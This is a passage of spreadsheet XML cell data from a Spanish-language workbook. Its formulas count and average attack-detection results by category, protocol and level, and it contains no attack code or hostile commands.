        <f t="shared" si="15"/>
        <v>0.8</v>
      </c>
      <c r="DY19" s="722">
        <v>0.4090909090909091</v>
      </c>
      <c r="DZ19" s="722"/>
      <c r="EA19" s="722"/>
      <c r="EE19" s="655" t="s">
        <v>427</v>
      </c>
      <c r="EF19" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG19" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH19" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI19" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE19  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ19" s="336"/>
      <c r="EK19" s="336"/>
      <c r="EL19" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP10&lt;&gt;0,'(B) - Detecciones - Ataques'!IP10*'(B) - Detecciones - Ataques'!IL10/('(B) - Detecciones - Ataques'!IL10+'(B) - Detecciones - Ataques'!IN10),0)</f>
        <v>1</v>
      </c>
      <c r="EM19" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP10&lt;&gt;0,'(B) - Detecciones - Ataques'!IP10*'(B) - Detecciones - Ataques'!IN10/('(B) - Detecciones - Ataques'!IL10+'(B) - Detecciones - Ataques'!IN10),0)</f>
        <v>0</v>
      </c>
      <c r="EN19" s="626"/>
      <c r="EO19" s="626"/>
      <c r="EP19" s="742"/>
      <c r="EQ19" s="743"/>
      <c r="ER19" s="740" t="s">
        <v>1373</v>
      </c>
      <c r="ES19" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER19)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER19 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="ET19" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER19)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER19 &amp; "*")</f>
        <v>19</v>
      </c>
      <c r="EU19" s="728">
        <f t="shared" si="16"/>
        <v>0.4210526316</v>
      </c>
      <c r="EV19" s="735"/>
      <c r="EW19" s="741"/>
      <c r="EX19" s="743"/>
      <c r="EY19" s="743"/>
      <c r="FQ19" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"FTP")</f>
        <v>FTP</v>
      </c>
      <c r="FR19" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ19)</f>
        <v>1</v>
      </c>
      <c r="FS19" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ19)</f>
        <v>1</v>
      </c>
      <c r="FT19" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ19)</f>
        <v>1</v>
      </c>
      <c r="FU19" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ19)</f>
        <v>3</v>
      </c>
    </row>
    <row r="20">
      <c r="D20" s="340" t="s">
        <v>2676</v>
      </c>
      <c r="E20" s="341" t="s">
        <v>2671</v>
      </c>
      <c r="G20" s="291" t="s">
        <v>2677</v>
      </c>
      <c r="H20" s="292"/>
      <c r="I20" s="292"/>
      <c r="J20" s="292"/>
      <c r="K20" s="292"/>
      <c r="L20" s="292"/>
      <c r="M20" s="292"/>
      <c r="N20" s="292"/>
      <c r="O20" s="292"/>
      <c r="P20" s="292"/>
      <c r="Q20" s="292"/>
      <c r="R20" s="292"/>
      <c r="S20" s="292"/>
      <c r="T20" s="292"/>
      <c r="U20" s="293"/>
      <c r="W20" s="294" t="s">
        <v>2678</v>
      </c>
      <c r="X20" s="292"/>
      <c r="Y20" s="292"/>
      <c r="Z20" s="292"/>
      <c r="AA20" s="292"/>
      <c r="AB20" s="292"/>
      <c r="AC20" s="292"/>
      <c r="AD20" s="292"/>
      <c r="AE20" s="292"/>
      <c r="AF20" s="292"/>
      <c r="AG20" s="292"/>
      <c r="AH20" s="292"/>
      <c r="AI20" s="292"/>
      <c r="AJ20" s="292"/>
      <c r="AK20" s="292"/>
      <c r="AL20" s="292"/>
      <c r="AM20" s="292"/>
      <c r="AN20" s="292"/>
      <c r="AO20" s="292"/>
      <c r="AP20" s="292"/>
      <c r="AQ20" s="292"/>
      <c r="AR20" s="292"/>
      <c r="AS20" s="292"/>
      <c r="AT20" s="292"/>
      <c r="AU20" s="292"/>
      <c r="AV20" s="292"/>
      <c r="AW20" s="292"/>
      <c r="AX20" s="292"/>
      <c r="AY20" s="292"/>
      <c r="AZ20" s="292"/>
      <c r="BA20" s="292"/>
      <c r="BB20" s="292"/>
      <c r="BC20" s="292"/>
      <c r="BD20" s="292"/>
      <c r="BE20" s="292"/>
      <c r="BF20" s="292"/>
      <c r="BG20" s="292"/>
      <c r="BH20" s="292"/>
      <c r="BI20" s="292"/>
      <c r="BJ20" s="292"/>
      <c r="BK20" s="292"/>
      <c r="BL20" s="292"/>
      <c r="BM20" s="292"/>
      <c r="BN20" s="292"/>
      <c r="BO20" s="292"/>
      <c r="BP20" s="292"/>
      <c r="BQ20" s="292"/>
      <c r="BR20" s="292"/>
      <c r="BS20" s="292"/>
      <c r="BT20" s="292"/>
      <c r="BU20" s="292"/>
      <c r="BV20" s="292"/>
      <c r="BW20" s="292"/>
      <c r="BX20" s="292"/>
      <c r="BY20" s="292"/>
      <c r="BZ20" s="292"/>
      <c r="CA20" s="292"/>
      <c r="CB20" s="292"/>
      <c r="CC20" s="292"/>
      <c r="CD20" s="292"/>
      <c r="CE20" s="292"/>
      <c r="CF20" s="292"/>
      <c r="CG20" s="292"/>
      <c r="CH20" s="292"/>
      <c r="CI20" s="292"/>
      <c r="CJ20" s="292"/>
      <c r="CK20" s="292"/>
      <c r="CL20" s="292"/>
      <c r="CM20" s="292"/>
      <c r="CN20" s="292"/>
      <c r="CO20" s="292"/>
      <c r="CP20" s="292"/>
      <c r="CQ20" s="292"/>
      <c r="CR20" s="292"/>
      <c r="CS20" s="292"/>
      <c r="CT20" s="292"/>
      <c r="CU20" s="292"/>
      <c r="CV20" s="292"/>
      <c r="CW20" s="292"/>
      <c r="CX20" s="292"/>
      <c r="CY20" s="293"/>
      <c r="CZ20" s="574"/>
      <c r="DA20" s="574"/>
      <c r="DB20" s="574"/>
      <c r="DC20" s="574"/>
      <c r="DD20" s="638" t="s">
        <v>310</v>
      </c>
      <c r="DE20" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>82</v>
      </c>
      <c r="DF20" s="719">
        <v>79.0</v>
      </c>
      <c r="DG20" s="337">
        <f t="shared" si="9"/>
        <v>0.9634146341</v>
      </c>
      <c r="DH20" s="719">
        <f t="shared" si="10"/>
        <v>3</v>
      </c>
      <c r="DI20" s="720">
        <f t="shared" si="11"/>
        <v>0.03658536585</v>
      </c>
      <c r="DJ20" s="719">
        <v>1.0</v>
      </c>
      <c r="DK20" s="20"/>
      <c r="DL20" s="20">
        <v>0.0</v>
      </c>
      <c r="DM20" s="20">
        <v>80.0</v>
      </c>
      <c r="DN20" s="336">
        <f t="shared" si="12"/>
        <v>0.9756097561</v>
      </c>
      <c r="DO20" s="336">
        <f t="shared" si="13"/>
        <v>0.0243902439</v>
      </c>
      <c r="DP20" s="721">
        <f t="shared" si="14"/>
        <v>80</v>
      </c>
      <c r="DR20" s="610"/>
      <c r="DS20" s="610"/>
      <c r="DT20" s="619" t="s">
        <v>310</v>
      </c>
      <c r="DU20" s="612">
        <f>DF20/'(D) - Análisis Resultados I - S'!EB39</f>
        <v>15.8</v>
      </c>
      <c r="DV20" s="574"/>
      <c r="DW20" s="619" t="s">
        <v>310</v>
      </c>
      <c r="DX20" s="612">
        <f t="shared" si="15"/>
        <v>0.9634146341</v>
      </c>
      <c r="DY20" s="722">
        <v>0.8</v>
      </c>
      <c r="DZ20" s="722"/>
      <c r="EA20" s="722"/>
      <c r="EE20" s="655" t="s">
        <v>1373</v>
      </c>
      <c r="EF20" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG20" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH20" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>-</v>
      </c>
      <c r="EI20" s="629" t="s">
        <v>12</v>
      </c>
      <c r="EJ20" s="20"/>
      <c r="EK20" s="20"/>
      <c r="EL20" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP11&lt;&gt;0,'(B) - Detecciones - Ataques'!IP11*'(B) - Detecciones - Ataques'!IL11/('(B) - Detecciones - Ataques'!IL11+'(B) - Detecciones - Ataques'!IN11),0)</f>
        <v>0</v>
      </c>
      <c r="EM20" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP11&lt;&gt;0,'(B) - Detecciones - Ataques'!IP11*'(B) - Detecciones - Ataques'!IN11/('(B) - Detecciones - Ataques'!IL11+'(B) - Detecciones - Ataques'!IN11),0)</f>
        <v>0</v>
      </c>
      <c r="EN20" s="626"/>
      <c r="EO20" s="626"/>
      <c r="EP20" s="744"/>
      <c r="EQ20" s="745"/>
      <c r="ER20" s="731" t="s">
        <v>209</v>
      </c>
      <c r="ES20" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER20)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER20 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="ET20" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER20)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER20 &amp; "*")</f>
        <v>13</v>
      </c>
      <c r="EU20" s="728">
        <f t="shared" si="16"/>
        <v>0.5384615385</v>
      </c>
      <c r="EV20" s="730"/>
      <c r="EW20" s="732"/>
      <c r="EX20" s="745"/>
      <c r="EY20" s="745"/>
      <c r="FQ20" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"WINREG")</f>
        <v>WINREG</v>
      </c>
      <c r="FR20" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ20)</f>
        <v>0</v>
      </c>
      <c r="FS20" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ20)</f>
        <v>0</v>
      </c>
      <c r="FT20" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ20)</f>
        <v>0</v>
      </c>
      <c r="FU20" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ20)</f>
        <v>1</v>
      </c>
    </row>
    <row r="21">
      <c r="D21" s="660">
        <f>D16/E9</f>
        <v>0.4400515987</v>
      </c>
      <c r="E21" s="648">
        <f>E16/E12</f>
        <v>0.8760697614</v>
      </c>
      <c r="G21" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="H21" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="I21" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="J21" s="316" t="s">
        <v>951</v>
      </c>
      <c r="K21" s="316" t="s">
        <v>633</v>
      </c>
      <c r="L21" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="M21" s="316" t="s">
        <v>244</v>
      </c>
      <c r="N21" s="316" t="s">
        <v>427</v>
      </c>
      <c r="O21" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="P21" s="316" t="s">
        <v>209</v>
      </c>
      <c r="Q21" s="316" t="s">
        <v>664</v>
      </c>
      <c r="R21" s="316" t="s">
        <v>357</v>
      </c>
      <c r="S21" s="316" t="s">
        <v>310</v>
      </c>
      <c r="T21" s="316" t="s">
        <v>292</v>
      </c>
      <c r="U21" s="317" t="s">
        <v>558</v>
      </c>
      <c r="W21" s="291" t="s">
        <v>2447</v>
      </c>
      <c r="X21" s="498" t="s">
        <v>2108</v>
      </c>
      <c r="Y21" s="513" t="s">
        <v>2177</v>
      </c>
      <c r="Z21" s="498" t="s">
        <v>2193</v>
      </c>
      <c r="AA21" s="498" t="s">
        <v>2095</v>
      </c>
      <c r="AB21" s="498" t="s">
        <v>2074</v>
      </c>
      <c r="AC21" s="498" t="s">
        <v>2061</v>
      </c>
      <c r="AD21" s="498" t="s">
        <v>2015</v>
      </c>
      <c r="AE21" s="498" t="s">
        <v>953</v>
      </c>
      <c r="AF21" s="498" t="s">
        <v>1040</v>
      </c>
      <c r="AG21" s="498" t="s">
        <v>1012</v>
      </c>
      <c r="AH21" s="498" t="s">
        <v>1164</v>
      </c>
      <c r="AI21" s="498" t="s">
        <v>1848</v>
      </c>
      <c r="AJ21" s="498" t="s">
        <v>2300</v>
      </c>
      <c r="AK21" s="498" t="s">
        <v>1138</v>
      </c>
      <c r="AL21" s="498" t="s">
        <v>974</v>
      </c>
      <c r="AM21" s="498" t="s">
        <v>1108</v>
      </c>
      <c r="AN21" s="498" t="s">
        <v>1702</v>
      </c>
      <c r="AO21" s="498" t="s">
        <v>1626</v>
      </c>
      <c r="AP21" s="514" t="s">
        <v>636</v>
      </c>
      <c r="AQ21" s="498" t="s">
        <v>1726</v>
      </c>
      <c r="AR21" s="498" t="s">
        <v>822</v>
      </c>
      <c r="AS21" s="498" t="s">
        <v>445</v>
      </c>
      <c r="AT21" s="498" t="s">
        <v>1747</v>
      </c>
      <c r="AU21" s="498" t="s">
        <v>989</v>
      </c>
      <c r="AV21" s="498" t="s">
        <v>246</v>
      </c>
      <c r="AW21" s="498" t="s">
        <v>2242</v>
      </c>
      <c r="AX21" s="498" t="s">
        <v>1282</v>
      </c>
      <c r="AY21" s="498" t="s">
        <v>429</v>
      </c>
      <c r="AZ21" s="498" t="s">
        <v>912</v>
      </c>
      <c r="BA21" s="498" t="s">
        <v>1837</v>
      </c>
      <c r="BB21" s="498" t="s">
        <v>1510</v>
      </c>
      <c r="BC21" s="498" t="s">
        <v>1411</v>
      </c>
      <c r="BD21" s="498" t="s">
        <v>1397</v>
      </c>
      <c r="BE21" s="498" t="s">
        <v>1374</v>
      </c>
      <c r="BF21" s="498" t="s">
        <v>677</v>
      </c>
      <c r="BG21" s="498" t="s">
        <v>790</v>
      </c>
      <c r="BH21" s="498" t="s">
        <v>262</v>
      </c>
      <c r="BI21" s="498" t="s">
        <v>771</v>
      </c>
      <c r="BJ21" s="498" t="s">
        <v>724</v>
      </c>
      <c r="BK21" s="498" t="s">
        <v>211</v>
      </c>
      <c r="BL21" s="498" t="s">
        <v>805</v>
      </c>
      <c r="BM21" s="498" t="s">
        <v>932</v>
      </c>
      <c r="BN21" s="498" t="s">
        <v>1306</v>
      </c>
      <c r="BO21" s="498" t="s">
        <v>1903</v>
      </c>
      <c r="BP21" s="498" t="s">
        <v>2335</v>
      </c>
      <c r="BQ21" s="498" t="s">
        <v>1983</v>
      </c>
      <c r="BR21" s="498" t="s">
        <v>1999</v>
      </c>
      <c r="BS21" s="498" t="s">
        <v>1971</v>
      </c>
      <c r="BT21" s="498" t="s">
        <v>1201</v>
      </c>
      <c r="BU21" s="498" t="s">
        <v>750</v>
      </c>
      <c r="BV21" s="498" t="s">
        <v>666</v>
      </c>
      <c r="BW21" s="498" t="s">
        <v>892</v>
      </c>
      <c r="BX21" s="498" t="s">
        <v>1214</v>
      </c>
      <c r="BY21" s="498" t="s">
        <v>1293</v>
      </c>
      <c r="BZ21" s="498" t="s">
        <v>1331</v>
      </c>
      <c r="CA21" s="498" t="s">
        <v>2215</v>
      </c>
      <c r="CB21" s="498" t="s">
        <v>2261</v>
      </c>
      <c r="CC21" s="498" t="s">
        <v>359</v>
      </c>
      <c r="CD21" s="498" t="s">
        <v>1230</v>
      </c>
      <c r="CE21" s="498" t="s">
        <v>1812</v>
      </c>
      <c r="CF21" s="498" t="s">
        <v>1958</v>
      </c>
      <c r="CG21" s="498" t="s">
        <v>1667</v>
      </c>
      <c r="CH21" s="498" t="s">
        <v>505</v>
      </c>
      <c r="CI21" s="498" t="s">
        <v>312</v>
      </c>
      <c r="CJ21" s="498" t="s">
        <v>2289</v>
      </c>
      <c r="CK21" s="498" t="s">
        <v>411</v>
      </c>
      <c r="CL21" s="498" t="s">
        <v>1361</v>
      </c>
      <c r="CM21" s="498" t="s">
        <v>701</v>
      </c>
      <c r="CN21" s="498" t="s">
        <v>586</v>
      </c>
      <c r="CO21" s="498" t="s">
        <v>294</v>
      </c>
      <c r="CP21" s="498" t="s">
        <v>339</v>
      </c>
      <c r="CQ21" s="498" t="s">
        <v>370</v>
      </c>
      <c r="CR21" s="498" t="s">
        <v>394</v>
      </c>
      <c r="CS21" s="498" t="s">
        <v>1687</v>
      </c>
      <c r="CT21" s="498" t="s">
        <v>486</v>
      </c>
      <c r="CU21" s="498" t="s">
        <v>1889</v>
      </c>
      <c r="CV21" s="498" t="s">
        <v>1187</v>
      </c>
      <c r="CW21" s="498" t="s">
        <v>560</v>
      </c>
      <c r="CX21" s="498" t="s">
        <v>1175</v>
      </c>
      <c r="CY21" s="499" t="s">
        <v>1926</v>
      </c>
      <c r="CZ21" s="403"/>
      <c r="DA21" s="403"/>
      <c r="DB21" s="403"/>
      <c r="DC21" s="403"/>
      <c r="DD21" s="638" t="s">
        <v>292</v>
      </c>
      <c r="DE21" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>4</v>
      </c>
      <c r="DF21" s="736">
        <v>0.0</v>
      </c>
      <c r="DG21" s="425" t="s">
        <v>12</v>
      </c>
      <c r="DH21" s="719">
        <f t="shared" si="10"/>
        <v>4</v>
      </c>
      <c r="DI21" s="719">
        <v>0.0</v>
      </c>
      <c r="DJ21" s="719">
        <v>2.0</v>
      </c>
      <c r="DK21" s="20"/>
      <c r="DL21" s="20">
        <v>0.0</v>
      </c>
      <c r="DM21" s="20">
        <v>3.0</v>
      </c>
      <c r="DN21" s="336">
        <f t="shared" si="12"/>
        <v>0.75</v>
      </c>
      <c r="DO21" s="336">
        <f t="shared" si="13"/>
        <v>0.25</v>
      </c>
      <c r="DP21" s="721">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="DR21" s="610"/>
      <c r="DS21" s="610"/>
      <c r="DT21" s="619" t="s">
        <v>292</v>
      </c>
      <c r="DU21" s="612">
        <f>DF21/'(D) - Análisis Resultados I - S'!EB40</f>
        <v>0</v>
      </c>
      <c r="DV21" s="403"/>
      <c r="DW21" s="619" t="s">
        <v>292</v>
      </c>
      <c r="DX21" s="612">
        <v>0.0</v>
      </c>
      <c r="DY21" s="722">
        <v>0.9634146341463414</v>
      </c>
      <c r="DZ21" s="722"/>
      <c r="EA21" s="722"/>
      <c r="EE21" s="665" t="s">
        <v>209</v>
      </c>
      <c r="EF21" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG21" s="69" t="str">
